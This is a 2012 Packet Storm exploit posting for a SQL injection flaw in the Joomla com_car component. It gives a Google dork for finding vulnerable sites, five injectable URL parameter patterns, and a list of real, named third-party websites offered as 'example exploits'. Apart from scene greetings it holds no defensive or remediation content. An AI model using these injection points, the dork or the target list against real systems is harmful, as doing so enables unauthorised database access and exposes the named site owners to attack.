Joomla Car SQL Injection

2012-01-21T00:00:00
ID PACKETSTORM:108909
Type packetstorm
Reporter the_cyber_nuxbie
Modified 2012-01-21T00:00:00

Description

                                        
                                            `[ Joomla Component com_car SQL Injection Vulnerability 0day ]  
  
#[~] Author : the_cyber_nuxbie  
#[~] Home : www.thecybernuxbie.com  
#[~] E-mail : staff@thecybernuxbie.com  
#[~] Found : 20 January 2012 - 07:45 PM.  
#[~] Tested On : Windows 7 Ultimate.  
#[~] Google Dork : inurl:"/index.php?option=com_car"  
  
[x] exploits:  
  
http://localhost/index.php?option=com_car&view=product&modelsid=[SQLi]  
  
http://localhost/index.php?option=com_car&view=product&task=showAll&markid=[SQLi]  
  
http://localhost/index.php?option=com_car&brand_id=[SQLi]  
  
http://localhost/index.php?option=com_car&view=product&task=detail&markid=6&modelsid=&cid[]=[SQLi]  
  
http://localhost/index.php?option=com_car&view=product&markid=&modelsid=[SQLi]  
  
- Example Exploits:  
http://mtcauto.com.vn/index.php?option=com_car&view=product&modelsid=3' [SQLi]  
http://qnoithat.com/index.php?option=com_car&view=product&task=showAll&markid=1' [SQLi]  
http://carwholesale.com/index.php?option=com_car&brand_id=1' [SQLi]  
http://mison.vn/index.php?option=com_car&view=product&task=detail&markid=6&modelsid=&cid[]=70' [SQLi]  
http://noithathungdung.com.vn/index.php?option=com_car&view=product&markid=&modelsid=3' [SQLi]  
  
- N0T35:  
0day no more...  
"n0 d0rk f0r kiddi0t"  
  
Thanks To:  
All Indonesian Hackers, c0ders, attackers, bloggers, programmers, etc...  
`